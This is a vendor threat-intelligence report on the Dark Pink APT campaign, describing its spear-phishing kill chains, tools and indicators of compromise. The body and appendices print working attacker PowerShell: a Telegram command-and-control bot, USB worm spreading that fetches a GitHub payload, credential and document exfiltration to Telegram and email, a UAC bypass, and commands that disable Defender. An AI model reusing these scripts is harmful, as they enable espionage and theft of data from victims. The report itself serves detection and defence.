Dark Pink
Andrey Polovinkin
Malware Analyst
Acknowledgements
Introduction
Group-IB continuously explores and analyzes the methods, tools, and tactics used by some of the world’s most prominent APT groups, such as APT41, but how can large-scale companies and organizations protect themselves when a new APT group emerges, or, if an already existing APT group begins to utilize a completely new toolkit. Enter Dark Pink.
Dark Pink is the name given by Group-IB to a new wave of APT attacks that has struck the APAC region. At the present time, Group-IB cannot attribute the campaign to any known threat actor, making it highly likely that Dark Pink is an entirely new APT group. Bearing this in mind, we will refer to Dark Pink as an APT group throughout the entirety of this text. The name Dark Pink was coined by forming a hybrid of some of the email addresses used by the threat actors during data exfiltration. The APT group has also been termed Saaiwc Group by Chinese cybersecurity researchers.
There is evidence to suggest that Dark Pink began operations as early as mid-2021, although the group’s activity surged in mid-to-late 2022. To date, Group-IB’s sector-leading Threat Intelligence uncovered seven confirmed attacks by Dark Pink. The bulk of the attacks were carried out against countries in the APAC region, although the threat actors spread their wings and targeted one European governmental ministry. The confirmed victims include two military bodies in the Philippines and Malaysia, government agencies in Cambodia, Indonesia and Bosnia and Herzegovina, and a religious organization in Vietnam. Group-IB also became aware of an unsuccessful attack on a European state development agency based in Vietnam. In line with Group-IB’s zero tolerance policy to cybercrime, confirmed and potential victims of Dark Pink were issued proactive notifications, and we note that the list of companies breached by this particular APT group is likely to be longer.
Group-IB’s early research into Dark Pink has revealed that these threat actors are leveraging a new set of tactics, techniques, and procedures rarely utilized by previously known APT groups. They leverage a custom toolkit, featuring TelePowerBot, KamiKakaBot, and Cucky and Ctealer information stealers (all names dubbed by Group-IB) with the aim of stealing confidential documentation held on the networks of government and military organizations. Of particular note is Dark Pink’s ability to infect even the USB devices attached to compromised computers, and also its ability to gain access to messengers on infected machines. Furthermore, Dark Pink threat actors utilize two core techniques: DLL Side-Loading and executing malicious content triggered by a file type association (Event Triggered Execution: Change Default File Association). The latter of these tactics is one rarely seen utilized in the wild by threat actors.
At the time of writing, Dark Pink is still active. Given the fact that many of the attacks identified by Group-IB researchers took place in the final months of 2022, Group-IB researchers are still in the process of identifying the full scope of the APT attack, and efforts to uncover the origin of this APT group are in process. However, we believe that this preliminary research, which will be of great interest to CISO, heads of cybersecurity teams, SOC analysts and incident response specialists, will go a long way to raising awareness of the new TTPs utilized by this threat actor and help organizations to take the relevant steps to protect themselves from a potentially devastating APT attack.
Key findings
- Dark Pink launched seven successful attacks against high-profile targets between June and December 2022.
- Dark Pink’s first activity, which we tie to a Github account leveraged by the threat actors, was recorded in mid-2021, and the first attack attributable to this APT group took place in June 2022. Their activity peaked in the final three months of 2022 when they launched four confirmed attacks.
- Dark Pink’s victims are located in five APAC countries (Vietnam, Malaysia, Indonesia, Cambodia, Philippines) and one European country (Bosnia and Herzegovina).
- Victims included military bodies, government and development agencies, religious organizations, and a non-profit organization.
- One unsuccessful attack was launched against a European state development agency based in Vietnam in October 2022.
- Dark Pink APT’s primary goals are to conduct corporate espionage, steal documents, capture the sound from the microphones of infected devices, and exfiltrate data from messengers.
- Dark Pink’s core initial vector was targeted spear-phishing emails that saw the threat actors pose as job applicants. There was evidence to suggest that the threat actors behind Dark Pink scanned online job vacancy portals and crafted unique emails to victims that were advertising vacancies.
- Almost all the tools leveraged by the threat actors were custom and self-made, including TelePowerBot and KamiKakaBot, along with the Cucky and Ctealer stealers. During our investigation, we noticed only one public tool: PowerSploit/Get-MicrophoneAudio.
- Dark Pink APT utilized a rarely seen technique, termed Event Triggered Execution: Change Default File Association, to ensure launch of malicious TelePowerBot malware. Another technique leveraged by these particular threat actors was DLL Side-Loading, which they used to avoid detection during initial access.
- The threat actors created a set of PowerShell scripts to carry out communication between victim and threat actors’ infrastructure, facilitate lateral movement and network reconnaissance.
- All communication between infected infrastructure and the threat actors behind Dark Pink is based on Telegram API.
Dark Pink takes on all comers
Figure 1: Screenshot detailing activity on Github account attributed to Dark Pink APT in 2021 (above) and 2022 (below)
Figure 2: Dark Pink APT timeline and targets
Kill Chain
Initial access was achieved by successful spear-phishing emails. These messages contained a shortened link directing the victim to download a malicious ISO image, which in one case seen by Group-IB, was stored on the public, free-to-use sharing service MediaFire. Once the ISO image was downloaded by the victims, Group-IB identified three distinct infection chains, which we will detail below.
The first thing that caught our attention was that all communication between the devices of the threat actors and the victims was based on Telegram API. The custom modules created by the threat actors, TelePowerBot and KamiKakaBot, are designed to read and execute commands via a threat actor-controlled Telegram bot. Interestingly, these modules were developed in different programming languages. TelePowerBot is represented as PowerShell script, while KamiKakaBot, which includes stealer functionalities, is developed on .NET. The threat actors have used the same Telegram bots for a long period of time, as one has been used since September 2021.
Additionally, Dark Pink APT utilizes the self-made stealers Ctealer and Cucky to steal victim credentials from web browsers. We will look at each of the above mentioned tools later in this report. At this stage, we will turn to detailing each step of the infection chain.
Initial access
The emails contain a shortened URL linking to a free-to-use file sharing site, where the victim is presented with the option to download an ISO image that contains all the files needed for the threat actors to infect the victim’s network. During our investigation into Dark Pink, we discovered that the threat actors leveraged several different ISO images, and we also noted that the documents contained in these ISO images varied from case to case. According to the information available to us, we strongly believe that the Dark Pink threat actors craft a unique email to each victim, and we do not discount that the threat actors can send the malicious ISO image as a direct attachment to the victim via email.
Figure 3: Screenshot of original spear-phishing email sent by Dark Pink APT noting the storage of the ISO image on a file-sharing site.

Figure 4: Screenshot detailing the five files contained in one ISO image seen by Group-IB. Note that the .doc and .dll files are in hidden view.
Trojan execution and persistence
Kill Chain 1: All-inclusive ISO
Figure 5: Graphic detailing the full scheme of Kill Chain 1
forfiles.exe /p %system32% /m notepad.exe /c "cmd.exe /c whoami >> %appdata%\a.abcd && %appdata%\a.abcd && exit"
At this point it might not be entirely clear how the next stage, and the launching of TelePowerBot, begins. The key to this answer is the file extension .abcd. In short, the threat actors create a file with this extension name as part of a technique termed Event Triggered Execution: Change Default File Association. The idea is to add a handler to work with the unrecognized file extension in the registry key tree. This is detailed in the below screenshot.
Figure 6: Screenshot detailing command to run upon creation of file with extension .abcd
Kill Chain 2: Github macros
Figure 7: Graphic detailing the full scheme of Kill Chain 2
This trick can help the malware avoid detection by antivirus software, as the document itself does not contain any malicious functionalities or code. The coded documents contain forms with several parameters, and the macros contained in these files can read these values and work to ensure persistence of TelePowerBot on the victim’s machine.
Figure 8: Screenshot detailing two forms contained predefined keys and values that are written to the registry by the malicious macro code written into the MS Word file sent to victims
Kill Chain 3: X(ML) marks the spot
Figure 9: Graphic detailing the full scheme of Kill Chain 3
Figure 10: Snippet of code inside XML file that unpacks and launches KakaKamiBot
Reconnaissance and lateral movement
- information from standard utility, e.g output of standard utility systeminfo.
- information from web browsers.
- installed software, including antivirus solutions.
- information about connected USB devices and network sharing.
The threat actors also collect a list of network and USB drives that are available for writing, and these are then used for lateral movement. Next, instead of the original file, the attack sees the creation of a LNK file (Windows shortcut) with a command to launch TelePowerDropper. At this stage, the original files are hidden from the user.
One of the most interesting revelations of our investigation into Dark Pink was how the threat actors carry out lateral movement over USB devices. For this, a new WMI event handler is registered. From this point onwards, each time a USB flash drive is plugged into an infected machine, a specific action will be executed that sees TeleBotDropper downloaded and stored on the flash drive. Let’s analyze this process a little deeper.
- 1Victim plugs USB flash drive into infected device
- 2The WMI event is triggered, and results in the automatic download of a .ZIP archive from the threat actors’ Github account. There are three files inside this archive: Dism.exe, Dism.sys, and Dismcore.dll. The first of these files is a legitimate file with a valid digital signature. The functionality of the DLL file is to unpack the original executable from file Dism.sys.
- 3Archive is extracted to %tmp% folder. The files are then copied to the USB device, where a new folder named “dism” is created. The folder attribution is changed to hidden and system.
- 4A file named system.bat is created, containing a command to launch Dism.exe
- 5Finally, as many LNK files are created as there are folders on the USB drive. The attributes of the original folder are changed to hidden and system. A LNK file is created with a command to open the hidden folder in explorer.exe and launch system.bat.
Data exfiltration
Dark Pink threat actors can also leverage their self-made stealers Cucky and Ctealer to draw data from infected machines. The functionalities of both of these stealers are the same. They can be used to extract data such as passwords, history, logins, and cookies from web browsers. The stealers themselves do not require any internet connection, as they save the result of the execution (stolen data) to files. Both of the stealers can be downloaded from the threat actors’ Github account automatically by commands issued by the malware. An example of the script used to launch Cucky is shown in APPENDIX C.
In total, Group-IB researchers discovered that Dark Pink exfiltrated files via three separate pathways. The first of these pathways sees the threat actors use Telegram to receive files. As a device is infected, information is collected in a specific folder by the malware and sent via Telegram by a special command. By extension, the files that are sent to the threat actors are: .doc, .docx, xls,.xlsx,.ppt,.pptx,.pdf. An example of a script that carries out this process can be found in APPENDIX D.
In addition to Telegram, Group-IB found evidence that the threat actors exfiltrated files via Dropbox. This method is slightly different to the one used to exfiltrate via Telegram, as it involves a series of PowerShell scripts that transfer files from a specific folder to a Dropbox account by performing a HTTP request with a hardcoded token.
One particular attack discovered by Group-IB was of particular surprise to us. Despite the device being controlled by commands issued by a threat actor-controlled Telegram channel via Telegram bots, some interesting files were sent via email. An example of this command is shown below.
$filepath="$env:tmp/backuplog";
$cred = New-Object System.Management.Automation.PSCredential ("lanhuong.jsc@outlook.com",(ConvertTo-SecureString "CHANGED" -AsPlainText -Force));
Send-MailMessage -To "blackpink.301@outlook[.]com" -From "blackred.113@outlook[.]com"
-Body "hello badboy" -SmtpServer "smtp-mail.outlook.com" -Port 587
-Subject "$env:computername" -UseSsl -Credential $cred
-Attachments (gci $filepath).fullname
alibaba.113@outlook[.]com
alibaba.113@outlook[.]com.vn
lanhuong.jsc@outlook[.]com
nphuongmai.97@outlook[.]com
Evasion techniques
Figure 11: Screenshot of decompiled executable that allows UAC to be bypassed
[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString(URL)));
[NETLUA.Main]::BypassUAC("powershell\", \"-c {$command}")
Set-MpPreference -DisableArchiveScanning $true -ea 0;
Set-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0;
Set-MpPreference -DisableCatchupFullScan $true -Force -ea 0;
Set-MpPreference -DisableCatchupQuickScan $true -Force -ea 0;
Set-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0;
Set-MpPreference -DisableIOAVProtection $true -Force -ea 0;
Set-MpPreference -DisableRealtimeMonitoring $true -Force -ea 0;
Set-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0;
Set-MpPreference -DisableRestorePoint $true -Force -ea 0;
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0;
Set-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0;
Set-MpPreference -DisableScriptScanning $true -Force -ea 0;
Set-MpPreference -EnableControlledFolderAccess Disabled -Force -ea 0;
Set-MpPreference -EnableNetworkProtection AuditMode -Force -ea 0;
Set-MpPreference -MAPSReporting Disabled -Force -ea 0;
Set-MpPreference -SubmitSamplesConsent NeverSend -Force -ea 0;
Set-MpPreference -PUAProtection Disabled -Force -ea 0
TOOLS
Cucky
Chrome, MS Edge, CocCoc, Chromium, Brave, Atom, Uran, Sputnik, Slimjet, Epic Privacy, Amigo, Vivaldy, Kometa, Comodo, Nichrome, Maxthon, Comodo Dragon, Avast Browser, Yandex Browser.
Figure 12: Screenshot of decompiled Cucky stealer
C:\Users\hoang\source\repos\Cucky\Cucky\obj\Release\net46\Cucky.pdb
Ctealer
Chrome, Chromium, MS Edge, Brave, Epic Privacy, Amigo, Vivaldi, Orbitum, Atom, Kometa, Dragon, Torch, Comodo, Slimjet, 360 Browser, Maxthon, K-Melon, Sputnik, Nichrome, CocCoc, Uran, Chromodo, Yandex Browser.
The sample found contained the path below to debug information:
C:\Users\build\source\repos\CtealWebCredential\Release\CtealWebCredential.pdb
TelePowerBot
iex(
[System.Text.Encoding]::UTF8.GetString(
([System.Convert]::FromBase64String(
(gp "HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell" -Name "abcd")."abcd") | % -Begin{$i=0} -Process{
$_ = $_ -bxor $i%256;$i++;$_
}
)
)
) | iex
This kind of tool communicates with a Telegram channel to receive new tasks from the threat actors. The bot can communicate with various infected devices, and the bot checks for new commands every 60 seconds. During execution, the bot works with two register keys: HKCU\Environment\Update and HKCU\Environment\guid. The first one stores the last message id, which is processed from the Telegram bot (The parameter update_id from Telegram). The second key stores the unique identification of infected machines. It is generated by command [guid]::NewGuid() when the bot launches for the first time. Upon registration, the threat actors get various pieces of information about the infected machine such as ip, guid, computer name. The IP address is also ascertained via a get request to https://ifconfig.me/ip. These processes are also based on PowerShell commands, and we will dig a little deeper into those later in the report. The bot implementation is shown in APPENDIX A.
KamiKakaBot
Figure 13: Screenshot detailing decompiled executable that contains KamiKakaBot
PowerSploit/Get-MicrophoneAudio
Start-Job {
while(1){
ps psr -erroraction 'silentlycontinue' | kill -force;sleep 30;
ni "$($env:tmp)\\record" -ItemType Directory -erroraction 'silentlycontinue';
start psr -ArgumentList "/start /output $($env:tmp)\\record\\$((get-date).tostring('yyyyMMddHHmmss')).zip /sc 1 /gui 0";
sleep 60;
start psr -ArgumentList "/stop"
}
}
ZMsg (Messenger exfiltration)
If Zalo messenger is present on the victim’s device, the threat actors can launch a command to download a special utility (dubbed ZMsg by Group-IB), from Github. This utility, which is a .NET application based on the FlaUI library, allows the threat actors to exfiltrate the victim’s messages on the Zalo platform. FlaUI is a library that assists with the automatic UI testing of Windows applications, with the entry point usually an application or the desktop to generate an automation element. Through this, it is possible to analyze sub-elements and interact with them.
ZMsg iterates elements on Windows applications to discover those with particular names. For example, the element with messages has the name “messageView”. All collected information is stored in the %TEMP%\KoVosRLvmU\ folder in files with the .dat and .bin extensions. File names are created as an encoded hex string, and are generated in accordance with the below template:
%PERSON_NAME%_%DAY%_%MONTH%_%YEAR%
Commands
During infection, the threat actors execute several standard commands (e.g. net share, Get-SmbShare) to determine what network resources are connected to the infected device. If network disk usage is found, they will begin exploring this disk to find files that may be of interest to them and potentially exfiltrate them. In the prior section, we noted how Dark Pink threat actors carry out lateral movement. In this campaign, the threat actors can also infect files on USB disks attached to the infected devices. The script below details how the threat actors compile a list of network shares and the removable devices connected to the machine.
(gwmi cim_logicaldisk|?{($_.drivetype -eq 2)-and(Test-path $($_.deviceid)\\)}).deviceid;
(get-smbshare|?{($_.name -notlike "*$")-and($_.name -ne Users)-and($_.path -like *:\\*)}).path;
(Get-SMBMapping|?{$_.Status -eq "OK"}).remotepath|?{$_ -notlike '*\\IPC$'}
Add-type -AssemblyName System.Drawing
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.Screen]::AllScreens|%{
$bounds =$_.bounds;
if($bounds.width -lt 1920){$bounds.width=1920}
if($bounds.height -lt 1080){$bounds.height=1080}
$image = New-Object Drawing.Bitmap $bounds.width, $bounds.height
$graphics = [Drawing.Graphics]::FromImage($image)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$screen_file = "$env:tmp\\$($_.DeviceName.replace('\\\\.\\',''))_$((get-date).tostring('yyyyMMddHHmmss')).png"
$image.Save($screen_file)
$graphics.Dispose()
$image.Dispose()
$screen_file
}
Conclusion
At this stage, Group-IB researchers can confidently say that Dark Pink was behind the successful breaches of at least seven organizations, although we believe that this number could be higher. In line with Group-IB’s zero-tolerance policy to cybercrime, our analysts will continue their diligent efforts to uncover Dark Pink’s origin and work to uncover more of the unique or peculiar TTPs utilized by this group. We will continue to issue proactive notifications to any organization we find to have been breached by this particular threat group.
In this blog, we attempted to reveal how Group-IB’s proprietary Threat Intelligence system, which detects attacks automatically, can identify the mechanics behind ongoing threat campaigns. Our clients are the first to be informed about Dark Pink, along with other new APT groups that may appear on the horizon, and they are also the first to obtain the names of compromised organizations, which helps them avoid supply-chain attacks and make their network infrastructure more secure.
Recommendations
- Use modern email protection measures to prevent initial compromise via spear-phishing emails. We recommend Group-IB’s Business Email Protection, which is able to counter these threats effectively.
- Organizations should ensure they foster a cybersecurity culture in their workplace, which includes sufficient training to staff on how to identify phishing emails.
- Ensure that your security measures allow for proactive threat hunting that can help identify threats that cannot be detected automatically.
- Limit access to file-sharing resources, with the exception of those used within the organization.
- Monitor the creation of LNK files in unusual locations, such as network drives and USB devices.
- Ensure that you observe any use of commands and built-in tools that are frequently used for collecting information about the system and files.
- Maintaining a secure organization requires ongoing vigilance, and using a proprietary solution such as Group-IB Threat Intelligence can help organizations shore up their security posture by equipping security teams with the latest insights into new and emerging threats.
Indicators of compromise
Cucky:
MD5: 926027F0308481610C85F4E3E433573B
SHA1: 24F65E0EE158FC63D98352F9828D014AB239AE16
SHA256: 9976625B5A3035DC68E878AD5AC3682CCB74EF2007C501C8023291548E11301A
Ctealer Loader:
MD5: 728AFA40B20DF6D2540648EF845EB754
SHA1: D8DF672ECD9018F3F2D23E5C966535C30A54B71D
SHA256: C60F778641942B7B0C00F3214211B137B683E8296ABB1905D2557BFB245BF775
Packed ctealer:
MD5: 7EAF1B65004421AC07C6BB1A997487B2
SHA1: 18CA159183C98F52DF45D3E9DB0087E17596A866
SHA256: E3181EE97D3FFD31C22C2C303C6E75D0196912083D0C21536E5833EE7D108736
MD5: 732091AD428419247BCE87603EA79F00
SHA1: 142F909C26BD57969EF93D7942587CDF15910E34
SHA256: E45DF7418CA47A9A4C4803697F4B28C618469C6E5A5678213AB81DF9FCC9FD51
$env:tmp\backuplog
$env:tmp\backuplog1
$env:appdata\archive.zip
$env:appdata\telegram.txt
$env:tmp\afkslfsa.csv
$env:tmp\AB.zip
$Env:tmp\AB
Microsoft Idle
gwgXSznM-Jz92k33A-uRcCCksA-9XAU93r5
HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKCU\Environment\OSBuild
HKCU\Environment\STMP
HKCU\Environment\SYSPS
HKCR:\zolfile\shell\open\command
HKCR:\zolofile\shell\open\command\zolo
HKCU:\Environment\guid
HKCU:\Environment\Update
HKCU:\Environment\UserInitMprLogonScript
HKCU:\SOFTWARE\\Classes\\abcdfile\shell\abcd\
HKCU:\SOFTWARE\Classes\.4ID\
HKCU:\SOFTWARE\Classes\.abcd
HKCU:\SOFTWARE\Classes\.psr
HKCU:\SOFTWARE\Classes\.zol
HKCU:\SOFTWARE\Classes\.zolo
HKCU:\SOFTWARE\Classes\4IDfile\shell\open\command
HKCU:\SOFTWARE\Classes\4IDfile\shell\open\command\
HKCU:\SOFTWARE\Classes\4IDfile\shell\open\command\DelegateExecute
HKCU:\SOFTWARE\Classes\4IDfile\shell\open\command\DelegateExecute\
HKCU:\SOFTWARE\Classes\abcdfile\shell
HKCU:\SOFTWARE\Classes\abcdfile\shell\aaaa
HKCU:\SOFTWARE\Classes\abcdfile\shell\abcd
HKCU:\SOFTWARE\Classes\abcdfile\shell\open\command
HKCU:\SOFTWARE\Classes\abcdfile\shell\open\command\abcd
HKCU:\SOFTWARE\Classes\abcdfile\shell\open\command\DelegateExecute
HKCU:\SOFTWARE\Classes\psrfile\shell\open\command
HKCU:\SOFTWARE\Classes\psrfile\shell\open\command -Name DelegateExecute
HKCU:\SOFTWARE\Classes\zolfile\shell\open\command\DelegateExecute
HKCU:\SOFTWARE\Classes\zolfile\shell\open\command\zolo
HKCU:\SOFTWARE\Classes\zolofile\shell\open\command
HKCU:\SOFTWARE\Classes\zolofile\shell\open\command -Name DelegateExecute
HKCU:\SOFTWARE\Classes\zolofile\shell\open\command -Name DelegateExecute
HKCU:\SOFTWARE\Classes\zolofile\shell\open\command -Name zolo
HKCU:\SOFTWARE\Classes\zolofile\shell\open\command -Name zolo -Value
HKCU:\SOFTWARE\Classes\zolofile\shell\open\command\zolo
HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Forfiles
HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Psr
HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Recents
APPENDIX A. TelePowerBot
[System.Net.ServicePointManager]::SecurityProtocol=@("Tls12","Tls11","Tls","Ssl3")
$token="CHANGED"
$id=CHANGED
$mid=(gp "HKCU:\\Environment" -name Update).Update
$guid = (gp "HKCU:\\Environment" -name guid).guid
$ip=irm "https://ifconfig.me/ip"
if( -not (New-Object System.Threading.Mutex($false, $guid)).WaitOne(1)){
exit
}
if($mid -and $guid){
irm -Uri "https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)&text=$guid :: $env:COMPUTERNAME :: $ip reconnected!"
}
else {
$guid = [guid]::NewGuid().guid
Set-ItemProperty "HKCU:\\Environment" -name "GUID" -value $guid
irm -Uri "https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)&text=$guid :: $env:COMPUTERNAME :: $ip new connection!"
}
if($mid -isnot [int]){
$mid = 0
}
while(1){
Start-Sleep 60;
(irm -Uri "https://api.telegram.org/bot$($token)/getUpdates").result|%{
if ($mid -lt $_.update_id) {
$mid=$_.update_id;
$name,$task=$_.message.text -split " :: ";
if ( ($name -like $ip) -or ($name -like $env:COMPUTERNAME) -or ($name -like $guid) -or ($name -like "all")) {
$message = $($task | iex)2>&1 | Out-String;
if ("" -eq $message){
$message="Task Done!"
}
$b=0;
while ($b -lt $message.Length) {
$c = 4000;
if (($c + $b) -gt $message.Length){$c=$message.Length % 4000}
irm -Uri "https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)&text=$guid :: $env:COMPUTERNAME :: $ip answer message : $($_.message.message_id)`n$($message.Substring($b,$c))"
$b+=$c
}
}
}
Set-ItemProperty "HKCU:\\Environment" -name "Update" -value $mid
}
}
APPENDIX B. PowerShell script to later movement over removable device
[Net.ServicePointManager]::SecurityProtocol=@("Tls12","Tls11","Tls","Ssl3");
$ErrorActionPreference="Continue";
$Query = "select * from __InstanceCreationEvent within 5 where TargetInstance ISA 'Win32_LogicalDisk' and TargetInstance.DriveType = 2";
$Action = {
(gwmi cim_logicaldisk|?{($_.drivetype -eq 2)-and(Test-path "$($_.deviceid)\")}).DeviceID|%{
$uri = "https://raw.githubusercontent.com/efimovah/abcd/main/xxx.gif";
Start-BitsTransfer -Source $uri -Destination "$Env:tmp\xxx.zip";
Expand-Archive -Path "$env:temp\xxx.zip" -DestinationPath "$env:temp" -force
cp "$env:temp\xxx" "$_\dism" -Recurse -Force;
sc "$_\system.bat" -value "@echo off`ncd %cd%dism`nstart dism.exe`nexit";
attrib +s +h "$_\dism";attrib +s +h "$_\dism\*.*";attrib +s +h "$_\system.bat";
(Gci "$_\" -Directory -force)|?{$_.name -notin ('dism','$RECYCLE.BIN','System Volume Information')}|%{
attrib +s +h "$($_.fullname)"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$($_.fullname).lnk")
$Shortcut.TargetPath = "%SystemRoot%\System32\cmd.exe"
$Shortcut.Arguments = "/c start explorer $($_.name) && system.bat && exit"
$Shortcut.IconLocation = "%SystemRoot%\System32\SHELL32.dll,4"
$Shortcut.WorkingDirectory = "%cd%"
$Shortcut.Save()
}
}
};
Register-WmiEvent -Query $Query -Action $Action -SourceIdentifier USBFlashDrive
APPENDIX C. PowerShell script to theft of credentials
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString("<https://raw.githubusercontent.com/efimovah/abcd/main/ZZZZZZZZZZZZZ.txt\>"))) | Out-Null;[kuky.Program]::Main();
Start-Sleep 60;
cp -path "$env:tmp\\backuplog" -Destination "$env:tmp\\backuplog1" -recurse -force; $file = "$env:tmp\\backuplog1";
$ascii = [System.Text.Encoding]::ascii;
Compress-Archive -Path $File -Destination "$file.zip" -Force;
$file = "$file.zip"
$reg = "HKCU:\\Environment"
$token,$chat_id = (gp $reg -name GUID).GUID -split "::"
Add-Type -AssemblyName System.Net.Http
$form = new-object System.Net.Http.MultipartFormDataContent
$form.Add($(New-Object System.Net.Http.StringContent $Chat_ID), 'chat_id')
$Content = [System.IO.File]::ReadAllBytes($file)
$byte = New-Object System.Net.Http.ByteArrayContent ($Content, 0, $Content.Length)
$byte.Headers.Add('Content-Type','text/plain')
$name = $ascii.getstring($ascii.getbytes("$($env:COMPUTERNAME)_$($file)")) -replace ':|\\\\|\\?','_'
$form.Add($byte, 'document', $name)
$ms = new-object System.IO.MemoryStream
$form.CopyToAsync($ms).Wait()
irm -Method Post -Body $ms.ToArray() -Uri "<https://api.telegram.org/bot$token/sendDocument\>" -ContentType $form.Headers.ContentType.ToString()
rm $file -Force -Recurse",
APPENDIX D. PowerShell script to exfiltrate documents from common network resource
$extentions = @('.doc','.docx','.xls','.xlsx','.ppt','.pptx','.pdf');
$file = "$env:tmp\\documents_$((get-date).tostring('yyyyMMddHHmmss')).csv"
gdr -PsProvider FileSystem | Select Root | %{gci -Path $_.Root -Recurse -ErrorAction SilentlyContinue} | ?{$_.fullname -notmatch 'C:\\\\Program Files*|C:\\\\Windows*'} | ?{$extentions -contains $_.Extension} | select name, fullname, LastWriteTime, length | Export-Csv -Path $file -encoding unicode;$file;
$ascii = [System.Text.Encoding]::ascii;
Compress-Archive -Path $File -Destination "$file.zip" -Force;
$file = "$file.zip"
$chat_id=CHANGED
$token="CHANGED"
Add-Type -AssemblyName System.Net.Http
$form = new-object System.Net.Http.MultipartFormDataContent
$form.Add($(New-Object System.Net.Http.StringContent $Chat_ID), 'chat_id')
$Content = [System.IO.File]::ReadAllBytes($file)
$byte = New-Object System.Net.Http.ByteArrayContent ($Content, 0, $Content.Length)
$byte.Headers.Add('Content-Type','text/plain')
$name = $ascii.getstring($ascii.getbytes("$($env:COMPUTERNAME)_$($file)")) -replace ':|\\\\|\\?','_'
$form.Add($byte, 'document', $name)
$ms = new-object System.IO.MemoryStream
$form.CopyToAsync($ms).Wait()
irm -Method Post -Body $ms.ToArray() -Uri "https://api.telegram.org/bot$token/sendDocument" -ContentType $form.Headers.ContentType.ToString()
rm $file -Force -Recurse
If you found this article helpful, share it with your friends!






